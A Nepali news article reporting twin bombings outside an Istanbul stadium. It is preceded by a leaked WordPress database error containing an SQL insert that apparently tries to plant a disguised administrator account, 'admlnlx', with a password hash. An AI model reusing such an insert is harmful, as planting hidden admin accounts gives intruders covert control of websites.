WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDUKwoKocznVHB6AmQSGcRIdfYxhib1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:52:41', '', 'admlnlx', 'admlnlx')
टर्की,मंसिर २६–
टर्कीको ईस्तानबुलमा एक रंगशाला बाहिर भएका दुई वटा विष्फोटमा २९ जनाको मृत्यु भएको छ भने १ सय ६६ जना घाइते भएका छन्। बेसिक्तास रंगशाला बाहिर प्रहरी अधिकारीलाई लक्षित गरी बम विष्फोट भएको थियो। प्रत्यक्षदर्शीले विष्फोटपछि गोली हानाहानको आवाज सुनिएको बताएका बीबीसी जनाएको छ।
प्रहरी अधिकारीहरूका अनुसार एउटा कार बम र अर्को आत्मघाती आक्रमण रहेको बताएका छन्। टर्कीका दुई प्रमुख क्लब बेसिक्तास र बर्सास्पोरबीच भएको खेल सकिएको दुई घन्टापछि बिस्फोट भएको हो। गृहमन्त्री सुलेमान सोयलुले रंगशालाबाट बाहिर निस्कने गेट बाहिर रहेका विशेष प्रहरी फोर्सका अधिकारीहरुलाई लक्षित गरी कार बम विष्फोट गराइएको बताएका छन्। उक्त घटनामा संलग्न भएको आशंकामा १० जनालाई पक्राउ गरिएको बीबीसीले जनाएको छ। उक्त आक्रमणको कुनै पनि समूहले जिम्मेवारी लिएको छैन। तर, टर्कीमा पछिल्लो समय यस्ता आक्रमण गर्ने गरेको कुर्दिस विद्रोहीले गरेको हुन सक्ने बताइएको छ।